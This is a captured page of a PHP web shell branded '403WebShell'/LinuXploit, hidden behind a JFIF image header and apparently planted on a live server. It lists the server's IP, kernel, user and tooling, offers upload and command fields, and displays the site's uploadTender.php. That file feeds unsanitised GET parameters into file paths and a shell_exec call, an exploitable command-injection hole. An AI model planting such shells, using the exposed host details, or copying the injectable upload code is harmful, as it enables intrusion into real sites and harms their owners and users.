????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 13.59.90.172
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/icad.astacus.se/project/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/icad.astacus.se/project/uploadTender.php
<?php

$projectId = $_GET['projectId'];
$type = $_GET['type'];

$target_dir = "tenders/";

if($type == "tender"){
	if($_FILES["fileToUpload2"]["tmp_name"] == ""){
		$target_file = $target_dir . $type."_".$projectId.".pdf";
		move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file);
	}else{
	
		
		$target_file1 = $target_dir . $type."_t1_".$projectId.".pdf";
		move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file1);
		$target_file2 = $target_dir . $type."_t2_".$projectId.".pdf";
		move_uploaded_file($_FILES["fileToUpload2"]["tmp_name"], $target_file2);
		
		
		$fileArray= array("'".$target_file1."'","'".$target_file2."'");

		$target_file = $target_dir . $type."_".$projectId.".pdf";

		$cmd = "gs -q -dNOPAUSE -dBATCH -sDEVICE=pdfwrite -sOutputFile=$target_file ";
		//Add each pdf file to the end of the command
		foreach($fileArray as $file) {
			$cmd .= $file." ";
		}

		$result = shell_exec($cmd);
		
	}
	
}else{
	
	$target_file = $target_dir . $type."_".$projectId.".pdf";
    move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file);
}


 
header("Location: index.php?page=project&projectId=$projectId");

?>

Youez - 2016 - github.com/yon3zu
LinuXploit